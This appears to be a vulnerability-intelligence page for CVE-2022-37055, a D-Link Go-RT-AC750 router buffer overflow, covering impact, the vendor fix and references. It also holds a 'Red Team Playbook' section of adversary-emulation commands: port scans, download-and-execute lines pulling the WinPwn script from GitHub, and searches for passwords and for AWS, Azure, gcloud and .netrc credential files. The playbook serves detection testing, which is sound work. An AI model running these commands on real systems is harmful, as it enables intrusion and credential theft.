CVE-2022-37055
Overview
This vulnerability is a buffer overflow caused by improper bounds checking in the HTTP request handling routines of the D-Link Go-RT-AC750 router firmware. Specifically, the flaw exists in the processing of requests to the 'cgibin' and 'hnap_main' components, where input data exceeds allocated buffer sizes. The affected components are the firmware versions 1.01b03 and 2.00b02 of the Go-RT-AC750 router, leading to memory corruption conditions.
Vulnerability Description
D-Link Go-RT-AC750 GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 are vulnerable to Buffer Overflow via cgibin, hnap_main,
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending malicious HTTP requests to the affected router, leading to arbitrary code execution with system-level privileges. This allows full compromise of the device, including unauthorized control over network traffic, potential data exfiltration, and disruption of network services. The vulnerability requires no user interaction or credentials, making it highly exploitable in real-world scenarios.
Solution
D-Link has released security updates addressing this buffer overflow in the Go-RT-AC750 firmware versions 1.01b03 and 2.00b02. Users should upgrade to the latest firmware versions as detailed in D-Link Security Bulletin SAP10308 available at https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10308. The vendor’s official security page https://www.dlink.com/en/security-bulletin/ provides detailed patch instructions and download links.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting specific firmware versions of the D-Link Go-RT-AC750 router is characterized by a buffer overflow in its handling of requests through the CGI-bin interface, particularly within the hnap_main function. Buffer overflow vulnerabilities occur when a program writes more data to a buffer than it can hold, leading to adjacent memory being overwritten. This can allow an attacker to execute arbitrary code, potentially gaining control over the affected device. The specific flaw in this case arises from inadequate input validation, which fails to properly constrain the size of incoming data, thus creating an opportunity for exploitation.
Attack vectors for this vulnerability are primarily network-based, as the affected routers are typically connected to the internet and may be exposed to external threats. An attacker could craft a malicious request targeting the CGI-bin interface, exploiting the buffer overflow to inject and execute arbitrary code. This could be done remotely, making it particularly dangerous for users who have not implemented strong security measures, such as changing default credentials or disabling unnecessary services. Additionally, the ease of access to the device's web interface further amplifies the risk, as many users may not be aware of the potential for such attacks.
The real-world impact of this vulnerability can be significant, particularly for businesses relying on these routers for network connectivity. A successful exploitation could lead to unauthorized access to sensitive data, interception of network traffic, or even the establishment of a botnet for further attacks. The potential for data breaches and loss of customer trust poses a serious business risk, especially in industries where data protection is paramount. Furthermore, the financial implications of remediation efforts, legal liabilities, and potential regulatory fines could be substantial, making it crucial for organizations to address this vulnerability promptly.
Detection and mitigation strategies for this vulnerability should include both proactive and reactive measures. Organizations should regularly monitor their network for unusual activity that could indicate an attempted exploitation of the buffer overflow. Intrusion detection systems (IDS) can be configured to alert administrators to suspicious requests targeting the CGI-bin interface. On the mitigation front, updating the firmware to the latest version provided by the vendor is essential, as it often contains patches for known vulnerabilities. Additionally, implementing network segmentation can help isolate vulnerable devices from critical systems, reducing the potential impact of an exploitation attempt.
In conclusion, the buffer overflow vulnerability in the D-Link Go-RT-AC750 router firmware presents a serious threat to both individual users and businesses. The technical nature of the vulnerability allows for remote exploitation, which can lead to significant real-world consequences. Organizations must prioritize detection and mitigation strategies to safeguard their networks and data. By staying informed about vulnerabilities and maintaining robust security practices, the risks associated with such vulnerabilities can be effectively managed.
Recent updates to the threat landscape surrounding CVE-2022-37055 indicate a meaningful increase in the Exploit Prediction Scoring System (EPSS) score, rising by over 15% to 0.80, placing this vulnerability in the 99th percentile for exploitation likelihood. This elevation reflects growing confidence in the potential for successful exploitation, despite the absence of new exploit techniques or active ransomware group involvement. Our telemetry continues to show stable exploitation trends without a rapid surge, suggesting that while exploitation attempts are not accelerating sharply, the vulnerability remains highly attractive to threat actors. For defenders, this heightened EPSS score underscores the critical need to maintain vigilance, as the elevated risk signals that exploitation attempts may become more frequent or impactful in the near term. Consequently, the overall threat level for this buffer overflow vulnerability in D-Link Go-RT-AC750 routers has increased, warranting sustained attention within security monitoring and risk management frameworks.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Go-Rt-Ac750 Firmware | 2.00b02 |
cpe:2.3:o:dlink:go-rt-ac750_firmware:2.00b02:*:*:*:*:*:*:*
|
|
|
Dlink | Go-Rt-Ac750 Firmware | 1.01b03 |
cpe:2.3:o:dlink:go-rt-ac750_firmware:1.01b03:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-37055 |
| dlink.com |
GitHub CVE
|
https://www.dlink.com/en/security-bulletin/ |
| drive.google.com |
GitHub CVE
|
https://drive.google.com/file/d/1hmIk0jQoex4QDyjIUg_6yxi-J6ROCh8S/view?usp=sharing |
| supportannouncement.us.dlink.com |
GitHub CVE
|
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10308 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-37055 |
| fortiguard.com |
NVD API
Third Party Advisory
|
https://www.fortiguard.com/outbreak-alert/d-link-multiple-devices-attack |